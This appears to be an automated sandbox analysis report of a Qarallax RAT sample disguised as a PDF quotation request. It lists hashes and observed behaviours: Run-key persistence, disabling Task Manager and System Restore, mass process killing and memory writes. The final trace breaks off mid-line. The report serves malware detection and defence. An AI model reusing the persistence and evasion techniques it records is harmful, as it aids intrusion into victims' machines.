Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
19/08/2020, 08:10
Static task
static1
Behavioral task
behavioral1
Sample
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
Resource
win7v200722
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
Resource
win10v200722
0 signatures
0 seconds
General
-
Target
BOLDROCCHI SRL ITALY QUOTATION REQUEST_PDF.jar
-
Size
411KB
-
MD5
10d957699927f69e41cf596817c4ca7b
-
SHA1
dad3d0a7a5cc52c7ef981ab2cc73de64d41c3561
-
SHA256
826f301f5f248d9586c0924a30c56cbb9cda42b82292a1ddd35b0b5ae087413c
-
SHA512
2149a85b712ae88c180353d71dccd1aed9d57c41407c679f070362396914233f3575d00d7394f370201e12e4db7b06f01c0f0a63e223af9f933dc0af53d9e243
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ae1d-54.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 584 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe File created C:\Users\Admin\ujTBR\Desktop.ini java.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\sJyzU java.exe File opened for modification C:\Windows\System32\sJyzU java.exe -
Kills process with taskkill 19 IoCs
pid Process 1800 taskkill.exe 1272 taskkill.exe 4784 taskkill.exe 2052 taskkill.exe 5044 taskkill.exe 1668 taskkill.exe 4600 taskkill.exe 4304 taskkill.exe 1640 taskkill.exe 3700 taskkill.exe 3112 taskkill.exe 2336 taskkill.exe 1416 taskkill.exe 4756 taskkill.exe 2868 taskkill.exe 1528 taskkill.exe 3732 taskkill.exe 4264 taskkill.exe 5020 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe 2260 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 584 java.exe -
Suspicious use of AdjustPrivilegeToken 167 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2656 WMIC.exe Token: SeSecurityPrivilege 2656 WMIC.exe Token: SeTakeOwnershipPrivilege 2656 WMIC.exe Token: SeLoadDriverPrivilege 2656 WMIC.exe Token: SeSystemProfilePrivilege 2656 WMIC.exe Token: SeSystemtimePrivilege 2656 WMIC.exe Token: SeProfSingleProcessPrivilege 2656 WMIC.exe Token: SeIncBasePriorityPrivilege 2656 WMIC.exe Token: SeCreatePagefilePrivilege 2656 WMIC.exe Token: SeBackupPrivilege 2656 WMIC.exe Token: SeRestorePrivilege 2656 WMIC.exe Token: SeShutdownPrivilege 2656 WMIC.exe Token: SeDebugPrivilege 2656 WMIC.exe Token: SeSystemEnvironmentPrivilege 2656 WMIC.exe Token: SeRemoteShutdownPrivilege 2656 WMIC.exe Token: SeUndockPrivilege 2656 WMIC.exe Token: SeManageVolumePrivilege 2656 WMIC.exe Token: 33 2656 WMIC.exe Token: 34 2656 WMIC.exe Token: 35 2656 WMIC.exe Token: 36 2656 WMIC.exe Token: SeIncreaseQuotaPrivilege 2656 WMIC.exe Token: SeSecurityPrivilege 2656 WMIC.exe Token: SeTakeOwnershipPrivilege 2656 WMIC.exe Token: SeLoadDriverPrivilege 2656 WMIC.exe Token: SeSystemProfilePrivilege 2656 WMIC.exe Token: SeSystemtimePrivilege 2656 WMIC.exe Token: SeProfSingleProcessPrivilege 2656 WMIC.exe Token: SeIncBasePriorityPrivilege 2656 WMIC.exe Token: SeCreatePagefilePrivilege 2656 WMIC.exe Token: SeBackupPrivilege 2656 WMIC.exe Token: SeRestorePrivilege 2656 WMIC.exe Token: SeShutdownPrivilege 2656 WMIC.exe Token: SeDebugPrivilege 2656 WMIC.exe Token: SeSystemEnvironmentPrivilege 2656 WMIC.exe Token: SeRemoteShutdownPrivilege 2656 WMIC.exe Token: SeUndockPrivilege 2656 WMIC.exe Token: SeManageVolumePrivilege 2656 WMIC.exe Token: 33 2656 WMIC.exe Token: 34 2656 WMIC.exe Token: 35 2656 WMIC.exe Token: 36 2656 WMIC.exe Token: SeIncreaseQuotaPrivilege 4048 WMIC.exe Token: SeSecurityPrivilege 4048 WMIC.exe Token: SeTakeOwnershipPrivilege 4048 WMIC.exe Token: SeLoadDriverPrivilege 4048 WMIC.exe Token: SeSystemProfilePrivilege 4048 WMIC.exe Token: SeSystemtimePrivilege 4048 WMIC.exe Token: SeProfSingleProcessPrivilege 4048 WMIC.exe Token: SeIncBasePriorityPrivilege 4048 WMIC.exe Token: SeCreatePagefilePrivilege 4048 WMIC.exe Token: SeBackupPrivilege 4048 WMIC.exe Token: SeRestorePrivilege 4048 WMIC.exe Token: SeShutdownPrivilege 4048 WMIC.exe Token: SeDebugPrivilege 4048 WMIC.exe Token: SeSystemEnvironmentPrivilege 4048 WMIC.exe Token: SeRemoteShutdownPrivilege 4048 WMIC.exe Token: SeUndockPrivilege 4048 WMIC.exe Token: SeManageVolumePrivilege 4048 WMIC.exe Token: 33 4048 WMIC.exe Token: 34 4048 WMIC.exe Token: 35 4048 WMIC.exe Token: 36 4048 WMIC.exe Token: SeIncreaseQuotaPrivilege 4048 WMIC.exe Token: SeSecurityPrivilege 4048 WMIC.exe Token: SeTakeOwnershipPrivilege 4048 WMIC.exe Token: SeLoadDriverPrivilege 4048 WMIC.exe Token: SeSystemProfilePrivilege 4048 WMIC.exe Token: SeSystemtimePrivilege 4048 WMIC.exe Token: SeProfSingleProcessPrivilege 4048 WMIC.exe Token: SeIncBasePriorityPrivilege 4048 WMIC.exe Token: SeCreatePagefilePrivilege 4048 WMIC.exe Token: SeBackupPrivilege 4048 WMIC.exe Token: SeRestorePrivilege 4048 WMIC.exe Token: SeShutdownPrivilege 4048 WMIC.exe Token: SeDebugPrivilege 4048 WMIC.exe Token: SeSystemEnvironmentPrivilege 4048 WMIC.exe Token: SeRemoteShutdownPrivilege 4048 WMIC.exe Token: SeUndockPrivilege 4048 WMIC.exe Token: SeManageVolumePrivilege 4048 WMIC.exe Token: 33 4048 WMIC.exe Token: 34 4048 WMIC.exe Token: 35 4048 WMIC.exe Token: 36 4048 WMIC.exe Token: SeDebugPrivilege 3732 taskkill.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeDebugPrivilege 4600 taskkill.exe Token: SeDebugPrivilege 1272 taskkill.exe Token: SeDebugPrivilege 4784 taskkill.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeIncreaseQuotaPrivilege 4796 WMIC.exe Token: SeSecurityPrivilege 4796 WMIC.exe Token: SeTakeOwnershipPrivilege 4796 WMIC.exe Token: SeLoadDriverPrivilege 4796 WMIC.exe Token: SeSystemProfilePrivilege 4796 WMIC.exe Token: SeSystemtimePrivilege 4796 WMIC.exe Token: SeProfSingleProcessPrivilege 4796 WMIC.exe Token: SeIncBasePriorityPrivilege 4796 WMIC.exe Token: SeCreatePagefilePrivilege 4796 WMIC.exe Token: SeBackupPrivilege 4796 WMIC.exe Token: SeRestorePrivilege 4796 WMIC.exe Token: SeShutdownPrivilege 4796 WMIC.exe Token: SeDebugPrivilege 4796 WMIC.exe Token: SeSystemEnvironmentPrivilege 4796 WMIC.exe Token: SeRemoteShutdownPrivilege 4796 WMIC.exe Token: SeUndockPrivilege 4796 WMIC.exe Token: SeManageVolumePrivilege 4796 WMIC.exe Token: 33 4796 WMIC.exe Token: 34 4796 WMIC.exe Token: 35 4796 WMIC.exe Token: 36 4796 WMIC.exe Token: SeIncreaseQuotaPrivilege 4796 WMIC.exe Token: SeSecurityPrivilege 4796 WMIC.exe Token: SeTakeOwnershipPrivilege 4796 WMIC.exe Token: SeLoadDriverPrivilege 4796 WMIC.exe Token: SeSystemProfilePrivilege 4796 WMIC.exe Token: SeSystemtimePrivilege 4796 WMIC.exe Token: SeProfSingleProcessPrivilege 4796 WMIC.exe Token: SeIncBasePriorityPrivilege 4796 WMIC.exe Token: SeCreatePagefilePrivilege 4796 WMIC.exe Token: SeBackupPrivilege 4796 WMIC.exe Token: SeRestorePrivilege 4796 WMIC.exe Token: SeShutdownPrivilege 4796 WMIC.exe Token: SeDebugPrivilege 4796 WMIC.exe Token: SeSystemEnvironmentPrivilege 4796 WMIC.exe Token: SeRemoteShutdownPrivilege 4796 WMIC.exe Token: SeUndockPrivilege 4796 WMIC.exe Token: SeManageVolumePrivilege 4796 WMIC.exe Token: 33 4796 WMIC.exe Token: 34 4796 WMIC.exe Token: 35 4796 WMIC.exe Token: 36 4796 WMIC.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeIncreaseQuotaPrivilege 2260 powershell.exe Token: SeSecurityPrivilege 2260 powershell.exe Token: SeTakeOwnershipPrivilege 2260 powershell.exe Token: SeLoadDriverPrivilege 2260 powershell.exe Token: SeSystemProfilePrivilege 2260 powershell.exe Token: SeSystemtimePrivilege 2260 powershell.exe Token: SeProfSingleProcessPrivilege 2260 powershell.exe Token: SeIncBasePriorityPrivilege 2260 powershell.exe Token: SeCreatePagefilePrivilege 2260 powershell.exe Token: SeBackupPrivilege 2260 powershell.exe Token: SeRestorePrivilege 2260 powershell.exe Token: SeShutdownPrivilege 2260 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe Token: SeSystemEnvironmentPrivilege 2260 powershell.exe Token: SeRemoteShutdownPrivilege 2260 powershell.exe Token: SeUndockPrivilege 2260 powershell.exe Token: SeManageVolumePrivilege 2260 powershell.exe Token: 33 2260 powershell.exe Token: 34 2260 powershell.exe Token: 35 2260 powershell.exe Token: 36 2260 powershell.exe Token: SeDebugPrivilege 4756 taskkill.exe Token: SeDebugPrivilege 2868 taskkill.exe Token: SeDebugPrivilege 4304 taskkill.exe Token: SeDebugPrivilege 4264 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 3700 taskkill.exe Token: SeDebugPrivilege 5020 taskkill.exe Token: SeDebugPrivilege 3112 taskkill.exe Token: SeDebugPrivilege 1528 taskkill.exe Token: SeDebugPrivilege 5044 taskkill.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1800 taskkill.exe Token: SeDebugPrivilege 2336 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 584 java.exe -
Suspicious use of WriteProcessMemory 416 IoCs
description pid Process procid_target PID 584 wrote to memory of 2872 584 java.exe 68 PID 584 wrote to memory of 2872 584 java.exe 68 PID 584 wrote to memory of 2568 584 java.exe 70 PID 584 wrote to memory of 2568 584 java.exe 70 PID 2568 wrote to memory of 2656 2568 cmd.exe 72 PID 2568 wrote to memory of 2656 2568 cmd.exe 72 PID 584 wrote to memory of 3760 584 java.exe 73 PID 584 wrote to memory of 3760 584 java.exe 73 PID 3760 wrote to memory of 4048 3760 cmd.exe 75 PID 3760 wrote to memory of 4048 3760 cmd.exe 75 PID 584 wrote to memory of 3932 584 java.exe 78 PID 584 wrote to memory of 3932 584 java.exe 78 PID 584 wrote to memory of 420 584 java.exe 80 PID 584 wrote to memory of 420 584 java.exe 80 PID 584 wrote to memory of 3804 584 java.exe 82 PID 584 wrote to memory of 3804 584 java.exe 82 PID 584 wrote to memory of 3448 584 java.exe 83 PID 584 wrote to memory of 3448 584 java.exe 83 PID 584 wrote to memory of 1136 584 java.exe 85 PID 584 wrote to memory of 1136 584 java.exe 85 PID 584 wrote to memory of 1324 584 java.exe 87 PID 584 wrote to memory of 1324 584 java.exe 87 PID 584 wrote to memory of 1520 584 java.exe 89 PID 584 wrote to memory of 1520 584 java.exe 89 PID 584 wrote to memory of 1668 584 java.exe 91 PID 584 wrote to memory of 1668 584 java.exe 91 PID 584 wrote to memory of 3920 584 java.exe 94 PID 584 wrote to memory of 3920 584 java.exe 94 PID 584 wrote to memory of 2260 584 java.exe 96 PID 584 wrote to memory of 2260 584 java.exe 96 PID 584 wrote to memory of 3680 584 java.exe 98 PID 584 wrote to memory of 3680 584 java.exe 98 PID 3920 wrote to memory of 4028 3920 cmd.exe 99 PID 3920 wrote to memory of 4028 3920 cmd.exe 99 PID 584 wrote to memory of 2512 584 java.exe 100 PID 584 wrote to memory of 2512 584 java.exe 100 PID 584 wrote to memory of 3732 584 java.exe 101 PID 584 wrote to memory of 3732 584 java.exe 101 PID 584 wrote to memory of 1296 584 java.exe 104 PID 584 wrote to memory of 1296 584 java.exe 104 PID 584 wrote to memory of 1636 584 java.exe 105 PID 584 wrote to memory of 1636 584 java.exe 105 PID 584 wrote to memory of 1516 584 java.exe 109 PID 584 wrote to memory of 1516 584 java.exe 109 PID 584 wrote to memory of 1664 584 java.exe 110 PID 584 wrote to memory of 1664 584 java.exe 110 PID 584 wrote to memory of 1772 584 java.exe 112 PID 584 wrote to memory of 1772 584 java.exe 112 PID 584 wrote to memory of 1776 584 java.exe 114 PID 584 wrote to memory of 1776 584 java.exe 114 PID 584 wrote to memory of 1132 584 java.exe 117 PID 584 wrote to memory of 1132 584 java.exe 117 PID 584 wrote to memory of 2844 584 java.exe 118 PID 584 wrote to memory of 2844 584 java.exe 118 PID 584 wrote to memory of 4192 584 java.exe 121 PID 584 wrote to memory of 4192 584 java.exe 121 PID 584 wrote to memory of 4244 584 java.exe 122 PID 584 wrote to memory of 4244 584 java.exe 122 PID 584 wrote to memory of 4316 584 java.exe 124 PID 584 wrote to memory of 4316 584 java.exe 124 PID 584 wrote to memory of 4364 584 java.exe 126 PID 584 wrote to memory of 4364 584 java.exe 126 PID 584 wrote to memory of 4424 584 java.exe 128 PID 584 wrote to memory of 4424 584 java.exe 128 PID 584 wrote to memory of 4508 584 java.exe 130 PID 584 wrote to memory of 4508 584 java.exe 130 PID 584 wrote to memory of 4560 584 java.exe 132 PID 584 wrote to memory of 4560 584 java.exe 132 PID 584 wrote to memory of 4600 584 java.exe 134 PID 584 wrote to memory of 4600 584 java.exe 134 PID 584 wrote to memory of 4652 584 java.exe 136 PID 584 wrote to memory of 4652 584 java.exe 136 PID 3920 wrote to memory of 4672 3920 cmd.exe 138 PID 3920 wrote to memory of 4672 3920 cmd.exe 138 PID 584 wrote to memory of 4712 584 java.exe 140 PID 584 wrote to memory of 4712 584 java.exe 140 PID 584 wrote to memory of 4776 584 java.exe 142 PID 584 wrote to memory of 4776 584 java.exe 142 PID 584 wrote to memory of 4816 584 java.exe 144 PID 584 wrote to memory of 4816 584 java.exe 144 PID 584 wrote to memory of 4924 584 java.exe 147 PID 584 wrote to memory of 4924 584 java.exe 147 PID 584 wrote to memory of 4964 584 java.exe 148 PID 584 wrote to memory of 4964 584 java.exe 148 PID 584 wrote to memory of 5040 584 java.exe 151 PID 584 wrote to memory of 5040 584 java.exe 151 PID 584 wrote to memory of 5056 584 java.exe 152 PID 584 wrote to memory of 5056 584 java.exe 152 PID 584 wrote to memory of 4184 584 java.exe 155 PID 584 wrote to memory of 4184 584 java.exe 155 PID 584 wrote to memory of 2336 584 java.exe 156 PID 584 wrote to memory of 2336 584 java.exe 156 PID 584 wrote to memory of 4300 584 java.exe 159 PID 584 wrote to memory of 4300 584 java.exe 159 PID 584 wrote to memory of 4324 584 java.exe 161 PID 584 wrote to memory of 4324 584 java.exe 161 PID 584 wrote to memory of 1128 584 java.exe 163 PID 584 wrote to memory of 1128 584 java.exe 163 PID 584 wrote to memory of 420 584 java.exe 165 PID 584 wrote to memory of 420 584 java.exe 165 PID 584 wrote to memory of 1520 584 java.exe 166 PID 584 wrote to memory of 1520 584 java.exe 166 PID 584 wrote to memory of 1272 584 java.exe 167 PID 584 wrote to memory of 1272 584 java.exe 167 PID 584 wrote to memory of 2592 584 java.exe 170 PID 584 wrote to memory of 2592 584 java.exe 170 PID 420 wrote to memory of 2576 420 cmd.exe 173 PID 420 wrote to memory of 2576 420 cmd.exe 173 PID 420 wrote to memory of 4280 420 cmd.exe 174 PID 420 wrote to memory of 4280 420 cmd.exe 174 PID 584 wrote to memory of 4180 584 java.exe 176 PID 584 wrote to memory of 4180 584 java.exe 176 PID 584 wrote to memory of 4784 584 java.exe 178 PID 584 wrote to memory of 4784 584 java.exe 178 PID 4180 wrote to memory of 4272 4180 cmd.exe 180 PID 4180 wrote to memory of 4272 4180 cmd.exe 180 PID 4180 wrote to memory of 4740 4180 cmd.exe 181 PID 4180 wrote to memory of 4740 4180 cmd.exe 181 PID 584 wrote to memory of 4332 584 java.exe 182 PID 584 wrote to memory of 4332 584 java.exe 182 PID 4332 wrote to memory of 4384 4332 cmd.exe 184 PID 4332 wrote to memory of 4384 4332 cmd.exe 184 PID 4332 wrote to memory of 4832 4332 cmd.exe 185 PID 4332 wrote to memory of 4832 4332 cmd.exe 185 PID 584 wrote to memory of 5024 584 java.exe 186 PID 584 wrote to memory of 5024 584 java.exe 186 PID 5024 wrote to memory of 4424 5024 cmd.exe 188 PID 5024 wrote to memory of 4424 5024 cmd.exe 188 PID 584 wrote to memory of 2052 584 java.exe 189 PID 584 wrote to memory of 2052 584 java.exe 189 PID 5024 wrote to memory of 4764 5024 cmd.exe 191 PID 5024 wrote to memory of 4764 5024 cmd.exe 191 PID 584 wrote to memory of 4548 584 java.exe 192 PID 584 wrote to memory of 4548 584 java.exe 192 PID 4548 wrote to memory of 3084 4548 cmd.exe 194 PID 4548 wrote to memory of 3084 4548 cmd.exe 194 PID 584 wrote to memory of 4780 584 java.exe 195 PID 584 wrote to memory of 4780 584 java.exe 195 PID 4548 wrote to memory of 4852 4548 cmd.exe 197 PID 4548 wrote to memory of 4852 4548 cmd.exe 197 PID 4780 wrote to memory of 4796 4780 cmd.exe 198 PID 4780 wrote to memory of 4796 4780 cmd.exe 198 PID 584 wrote to memory of 4956 584 java.exe 199 PID 584 wrote to memory of 4956 584 java.exe 199 PID 4956 wrote to memory of 2364 4956 cmd.exe 201 PID 4956 wrote to memory of 2364 4956 cmd.exe 201 PID 4956 wrote to memory of 3792 4956 cmd.exe 202 PID 4956 wrote to memory of 3792 4956 cmd.exe 202 PID 584 wrote to memory of 4168 584 java.exe 203 PID 584 wrote to memory of 4168 584 java.exe 203 PID 4168 wrote to memory of 2340 4168 cmd.exe 205 PID 4168 wrote to memory of 2340 4168 cmd.exe 205 PID 4168 wrote to memory of 4212 4168 cmd.exe 206 PID 4168 wrote to memory of 4212 4168 cmd.exe 206 PID 584 wrote to memory of 5060 584 java.exe 207 PID 584 wrote to memory of 5060 584 java.exe 207 PID 584 wrote to memory of 1416 584 java.exe 208 PID 584 wrote to memory of 1416 584 java.exe 208 PID 5060 wrote to memory of 4140 5060 cmd.exe 211 PID 5060 wrote to memory of 4140 5060 cmd.exe 211 PID 5060 wrote to memory of 1136 5060 cmd.exe 212 PID 5060 wrote to memory of 1136 5060 cmd.exe 212 PID 584 wrote to memory of 1424 584 java.exe 213 PID 584 wrote to memory of 1424 584 java.exe 213 PID 1424 wrote to memory of 2092 1424 cmd.exe 215 PID 1424 wrote to memory of 2092 1424 cmd.exe 215 PID 1424 wrote to memory of 1160 1424 cmd.exe 216 PID 1424 wrote to memory of 1160 1424 cmd.exe 216 PID 584 wrote to memory of 4436 584 java.exe 217 PID 584 wrote to memory of 4436 584 java.exe 217 PID 4436 wrote to memory of 3448 4436 cmd.exe 219 PID 4436 wrote to memory of 3448 4436 cmd.exe 219 PID 4436 wrote to memory of 4240 4436 cmd.exe 220 PID 4436 wrote to memory of 4240 4436 cmd.exe 220 PID 584 wrote to memory of 1128 584 java.exe 221 PID 584 wrote to memory of 1128 584 java.exe 221 PID 1128 wrote to memory of 1776 1128 cmd.exe 223 PID 1128 wrote to memory of 1776 1128 cmd.exe 223 PID 1128 wrote to memory of 4156 1128 cmd.exe 224 PID 1128 wrote to memory of 4156 1128 cmd.exe 224 PID 584 wrote to memory of 2848 584 java.exe 225 PID 584 wrote to memory of 2848 584 java.exe 225 PID 2848 wrote to memory of 3876 2848 cmd.exe 227 PID 2848 wrote to memory of 3876 2848 cmd.exe 227 PID 2848 wrote to memory of 4996 2848 cmd.exe 228 PID 2848 wrote to memory of 4996 2848 cmd.exe 228 PID 584 wrote to memory of 4664 584 java.exe 229 PID 584 wrote to memory of 4664 584 java.exe 229 PID 4664 wrote to memory of 3732 4664 cmd.exe 231 PID 4664 wrote to memory of 3732 4664 cmd.exe 231 PID 4664 wrote to memory of 4232 4664 cmd.exe 232 PID 4664 wrote to memory of 4232 4664 cmd.exe 232 PID 584 wrote to memory of 4592 584 java.exe 233 PID 584 wrote to memory of 4592 584 java.exe 233 PID 4592 wrote to memory of 1844 4592 cmd.exe 235 PID 4592 wrote to memory of 1844 4592 cmd.exe 235 PID 584 wrote to memory of 4756 584 java.exe 236 PID 584 wrote to memory of 4756 584 java.exe 236 PID 4592 wrote to memory of 4620 4592 cmd.exe 238 PID 4592 wrote to memory of 4620 4592 cmd.exe 238 PID 584 wrote to memory of 2012 584 java.exe 239 PID 584 wrote to memory of 2012 584 java.exe 239 PID 2012 wrote to memory of 4876 2012 cmd.exe 241 PID 2012 wrote to memory of 4876 2012 cmd.exe 241 PID 2012 wrote to memory of 4908 2012 cmd.exe 242 PID 2012 wrote to memory of 4908 2012 cmd.exe 242 PID 584 wrote to memory of 5016 584 java.exe 243 PID 584 wrote to memory of 5016 584 java.exe 243 PID 5016 wrote to memory of 4832 5016 cmd.exe 245 PID 5016 wrote to memory of 4832 5016 cmd.exe 245 PID 5016 wrote to memory of 4704 5016 cmd.exe 246 PID 5016 wrote to memory of 4704 5016 cmd.exe 246 PID 584 wrote to memory of 4788 584 java.exe 247 PID 584 wrote to memory of 4788 584 java.exe 247 PID 4788 wrote to memory of 4236 4788 cmd.exe 249 PID 4788 wrote to memory of 4236 4788 cmd.exe 249 PID 4788 wrote to memory of 5088 4788 cmd.exe 251 PID 4788 wrote to memory of 5088 4788 cmd.exe 251 PID 584 wrote to memory of 3084 584 java.exe 252 PID 584 wrote to memory of 3084 584 java.exe 252 PID 3084 wrote to memory of 1208 3084 cmd.exe 254 PID 3084 wrote to memory of 1208 3084 cmd.exe 254 PID 3084 wrote to memory of 3040 3084 cmd.exe 255 PID 3084 wrote to memory of 3040 3084 cmd.exe 255 PID 584 wrote to memory of 3396 584 java.exe 256 PID 584 wrote to memory of 3396 584 java.exe 256 PID 3396 wrote to memory of 3324 3396 cmd.exe 258 PID 3396 wrote to memory of 3324 3396 cmd.exe 258 PID 584 wrote to memory of 2868 584 java.exe 259 PID 584 wrote to memory of 2868 584 java.exe 259 PID 3396 wrote to memory of 4164 3396 cmd.exe 261 PID 3396 wrote to memory of 4164 3396 cmd.exe 261 PID 584 wrote to memory of 2512 584 java.exe 262 PID 584 wrote to memory of 2512 584 java.exe 262 PID 2512 wrote to memory of 1640 2512 cmd.exe 264 PID 2512 wrote to memory of 1640 2512 cmd.exe 264 PID 2512 wrote to memory of 1416 2512 cmd.exe 265 PID 2512 wrote to memory of 1416 2512 cmd.exe 265 PID 584 wrote to memory of 1164 584 java.exe 266 PID 584 wrote to memory of 1164 584 java.exe 266 PID 1164 wrote to memory of 1612 1164 cmd.exe 268 PID 1164 wrote to memory of 1612 1164 cmd.exe 268 PID 1164 wrote to memory of 4744 1164 cmd.exe 269 PID 1164 wrote to memory of 4744 1164 cmd.exe 269 PID 584 wrote to memory of 4324 584 java.exe 270 PID 584 wrote to memory of 4324 584 java.exe 270 PID 4324 wrote to memory of 2552 4324 cmd.exe 272 PID 4324 wrote to memory of 2552 4324 cmd.exe 272 PID 4324 wrote to memory of 1776 4324 cmd.exe 273 PID 4324 wrote to memory of 1776 4324 cmd.exe 273 PID 584 wrote to memory of 3768 584 java.exe 274 PID 584 wrote to memory of 3768 584 java.exe 274 PID 3768 wrote to memory of 4600 3768 cmd.exe 276 PID 3768 wrote to memory of 4600 3768 cmd.exe 276 PID 3768 wrote to memory of 3512 3768 cmd.exe 277 PID 3768 wrote to memory of 3512 3768 cmd.exe 277 PID 584 wrote to memory of 2812 584 java.exe 278 PID 584 wrote to memory of 2812 584 java.exe 278 PID 2812 wrote to memory of 4120 2812 cmd.exe 280 PID 2812 wrote to memory of 4120 2812 cmd.exe 280 PID 584 wrote to memory of 4304 584 java.exe 281 PID 584 wrote to memory of 4304 584 java.exe 281 PID 2812 wrote to memory of 4620 2812 cmd.exe 282 PID 2812 wrote to memory of 4620 2812 cmd.exe 282 PID 584 wrote to memory of 4192 584 java.exe 284 PID 584 wrote to memory of 4192 584 java.exe 284 PID 4192 wrote to memory of 4756 4192 cmd.exe 286 PID 4192 wrote to memory of 4756 4192 cmd.exe 286 PID 4192 wrote to memory of 4888 4192 cmd.exe 287 PID 4192 wrote to memory of 4888 4192 cmd.exe 287 PID 584 wrote to memory of 5028 584 java.exe 288 PID 584 wrote to memory of 5028 584 java.exe 288 PID 5028 wrote to memory of 2416 5028 cmd.exe 290 PID 5028 wrote to memory of 2416 5028 cmd.exe 290 PID 5028 wrote to memory of 4116 5028 cmd.exe 291 PID 5028 wrote to memory of 4116 5028 cmd.exe 291 PID 584 wrote to memory of 4976 584 java.exe 292 PID 584 wrote to memory of 4976 584 java.exe 292 PID 4976 wrote to memory of 3408 4976 cmd.exe 294 PID 4976 wrote to memory of 3408 4976 cmd.exe 294 PID 4976 wrote to memory of 4024 4976 cmd.exe 295 PID 4976 wrote to memory of 4024 4976 cmd.exe 295 PID 584 wrote to memory of 4220 584 java.exe 296 PID 584 wrote to memory of 4220 584 java.exe 296 PID 4220 wrote to memory of 2708 4220 cmd.exe 298 PID 4220 wrote to memory of 2708 4220 cmd.exe 298 PID 4220 wrote to memory of 1004 4220 cmd.exe 299 PID 4220 wrote to memory of 1004 4220 cmd.exe 299 PID 584 wrote to memory of 4840 584 java.exe 300 PID 584 wrote to memory of 4840 584 java.exe 300 PID 584 wrote to memory of 4264 584 java.exe 301 PID 584 wrote to memory of 4264 584 java.exe 301 PID 4840 wrote to memory of 2684 4840 cmd.exe 304 PID 4840 wrote to memory of 2684 4840 cmd.exe 304 PID 4840 wrote to memory of 4164 4840 cmd.exe 305 PID 4840 wrote to memory of 4164 4840 cmd.exe 305 PID 584 wrote to memory of 3292 584 java.exe 306 PID 584 wrote to memory of 3292 584 java.exe 306 PID 3292 wrote to memory of 3796 3292 cmd.exe 308 PID 3292 wrote to memory of 3796 3292 cmd.exe 308 PID 3292 wrote to memory of 4224 3292 cmd.exe 309 PID 3292 wrote to memory of 4224 3292 cmd.exe 309 PID 584 wrote to memory of 4608 584 java.exe 310 PID 584 wrote to memory of 4608 584 java.exe 310 PID 4608 wrote to memory of 2188 4608 cmd.exe 312 PID 4608 wrote to memory of 2188 4608 cmd.exe 312 PID 4608 wrote to memory of 2592 4608 cmd.exe 313 PID 4608 wrote to memory of 2592 4608 cmd.exe 313 PID 584 wrote to memory of 1440 584 java.exe 314 PID 584 wrote to memory of 1440 584 java.exe 314 PID 1440 wrote to memory of 2548 1440 cmd.exe 316 PID 1440 wrote to memory of 2548 1440 cmd.exe 316 PID 1440 wrote to memory of 4824 1440 cmd.exe 317 PID 1440 wrote to memory of 4824 1440 cmd.exe 317 PID 584 wrote to memory of 4272 584 java.exe 318 PID 584 wrote to memory of 4272 584 java.exe 318 PID 4272 wrote to memory of 4756 4272 cmd.exe 320 PID 4272 wrote to memory of 4756 4272 cmd.exe 320 PID 4272 wrote to memory of 4888 4272 cmd.exe 321 PID 4272 wrote to memory of 4888 4272 cmd.exe 321 PID 584 wrote to memory of 4864 584 java.exe 322 PID 584 wrote to memory of 4864 584 java.exe 322 PID 4864 wrote to memory of 4784 4864 cmd.exe 324 PID 4864 wrote to memory of 4784 4864 cmd.exe 324 PID 4864 wrote to memory of 4236 4864 cmd.exe 325 PID 4864 wrote to memory of 4236 4864 cmd.exe 325 PID 584 wrote to memory of 5032 584 java.exe 326 PID 584 wrote to memory of 5032 584 java.exe 326 PID 5032 wrote to memory of 4968 5032 cmd.exe 328 PID 5032 wrote to memory of 4968 5032 cmd.exe 328 PID 5032 wrote to memory of 1388 5032 cmd.exe 329 PID 5032 wrote to memory of 1388 5032 cmd.exe 329 PID 584 wrote to memory of 3040 584 java.exe 330 PID 584 wrote to memory of 3040 584 java.exe 330 PID 3040 wrote to memory of 1456 3040 cmd.exe 332 PID 3040 wrote to memory of 1456 3040 cmd.exe 332 PID 3040 wrote to memory of 2120 3040 cmd.exe 333 PID 3040 wrote to memory of 2120 3040 cmd.exe 333 PID 584 wrote to memory of 4836 584 java.exe 334 PID 584 wrote to memory of 4836 584 java.exe 334 PID 4836 wrote to memory of 